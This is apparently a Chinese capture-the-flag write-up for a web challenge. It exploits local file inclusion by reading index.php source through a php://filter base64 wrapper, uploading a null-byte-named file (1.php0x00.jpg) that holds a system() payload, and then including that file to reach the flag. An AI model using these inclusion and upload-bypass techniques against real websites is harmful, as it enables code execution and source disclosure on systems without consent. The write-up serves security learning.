分析
1、打开题目链接,发现url为http://123.206.31.85:49166/index.php?file=hello.php很明显的字眼file
2、然后看一下源代码,发现一个event,意思是按一下b会重定向到Bookmark Page,结果尝试了发现是骗人的。。
3、首先尝试改url为
?file=php://filter/read=convert.base64-encode/resource=index.php
结果
发现注释里一个很明显的提示
3、访问?file=upload.php,开始构造payload
<script>system(1)</script>
将其保存到1.php0x00.jpg文件中(文件名的构造 见 https://blog.csdn.net/zyl_wjl_1413/article/details/84108843)
4、上传得到
发现上传的文件保存在upload/201811200808103126.jpg
5、因此访问?file=upload/201811200808103126.jpg
6、访问?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt即得flag
新姿势
1、既然是文件包含,一定要牢记访问文件,这是一种思维
2、payload构造,上传的文件究竟应该干什么,这一点要清楚